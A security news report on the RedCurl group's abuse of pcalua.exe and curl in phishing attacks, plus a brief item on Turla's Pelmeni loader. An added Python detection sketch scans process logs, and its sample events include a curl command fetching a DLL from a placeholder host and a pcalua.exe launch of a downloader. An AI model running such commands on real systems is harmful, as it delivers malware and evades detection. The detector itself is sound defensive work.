The Russian-speaking cybercrime group known as RedCurl is abusing a legitimate Microsoft Windows component called the Program Compatibility Assistant (PCA) to execute malicious commands.
“The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs,” Trend Micro said in an analysis published this month.
“Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities.”
RedCurl, which is also called Earth Kapre and Red Wolf, is known to have been active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
In July 2023, F.A.C.C.T. disclosed that a major Russian bank and an Australian company had been targeted by the threat actor in November 2022 and May 2023 to pilfer confidential corporate secrets and employee information.
The attack chain examined by Trend Micro involves the use of phishing emails containing malicious attachments (.ISO and .IMG files) to trigger a multi-stage process that starts with the use of cmd.exe to download a legitimate utility called curl from a remote server, which then acts as a channel to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to spawn a downloader process that takes care of establishing contact with the same domain used by curl to fetch the loader.
Also used in the attack is the Impacket open-source software for unauthorized command execution.
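As an added illustration of how a defender might surface the two living-off-the-land steps in this chain (a shell spawning curl to write a remote file to disk, and pcalua.exe launching a program via its `-a` switch), the following Python sketch scans process-creation records. It is not Trend Micro's code; the events are constructed in the shape of Sysmon process-creation fields, and the hostnames and file paths are placeholders.

```python
# Added example: flag curl-from-shell downloads and pcalua.exe -a launches in process logs.
import ntpath
import re
import shlex

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(users|temp|programdata|appdata)\\", re.I)

def ev(image, parent, cmdline):
    return {"Image": image, "ParentImage": parent, "CommandLine": cmdline}

# Constructed sample events (not real telemetry); hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    ev(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
       r"curl.exe -o C:\Users\Public\ms.dll http://example.invalid/ms.dll"),
    ev(r"C:\Windows\System32\pcalua.exe", r"C:\Windows\System32\rundll32.exe",
       r"pcalua.exe -a C:\Users\Public\downloader.exe"),
    ev(r"C:\Windows\System32\pcalua.exe", r"C:\Windows\explorer.exe",
       r"pcalua.exe -a C:\Program Files\OldApp\setup.exe"),  # benign compat use
    ev(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\powershell.exe",
       r"curl.exe https://example.invalid/api"),  # benign: nothing written to disk
]

def basename(path):
    return ntpath.basename(path).lower()

def check_pcalua(e):
    """pcalua.exe as an alternate launcher: '-a <program>' where the target sits
    in a user-writable path or the parent is a script/LOLBin host."""
    args = shlex.split(e["CommandLine"], posix=False)  # keep Windows backslashes
    if basename(e["Image"]) != "pcalua.exe" or "-a" not in args:
        return None
    target = " ".join(args[args.index("-a") + 1:])
    suspicious_parent = basename(e["ParentImage"]) in SCRIPT_HOSTS
    if USER_WRITABLE.search(target) or suspicious_parent:
        return "pcalua_alt_launcher"
    return None

def check_curl(e):
    """curl.exe spawned by a shell or script host, given a URL and told to write a file."""
    args = shlex.split(e["CommandLine"], posix=False)
    if basename(e["Image"]) != "curl.exe" or basename(e["ParentImage"]) not in SCRIPT_HOSTS:
        return None
    has_url = any(re.match(r"https?://", a, re.I) for a in args)
    writes_file = any(a in ("-o", "-O", "--output") for a in args)
    return "shell_curl_download" if has_url and writes_file else None

def scan(events):
    """Return (rule, image, command line) for every event a rule matches."""
    return [(tag, basename(e["Image"]), e["CommandLine"])
            for e in events for tag in (check_pcalua(e), check_curl(e)) if tag]
```

Running `scan(SAMPLE_EVENTS)` flags the curl download and the pcalua.exe launch from a user-writable path while leaving the two benign events alone; the parent-process and path heuristics are a starting point to tune against your own baseline of legitimate pcalua.exe and curl use.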
The connections to Earth Kapre stem from overlaps in the command-and-control (C2) infrastructure as well as similarities with known downloader artifacts used by the group.
“This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries,” Trend Micro said.
“The actor employs sophisticated methods, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its dedication to evading detection within targeted networks.”
The development comes as the Russian nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun using a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.
Pelmeni – which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS – is loaded by means of DLL side-loading. Once this spoofed DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar, Lab52 said.
Some sections of this posting are sourced from:
thehackernews.com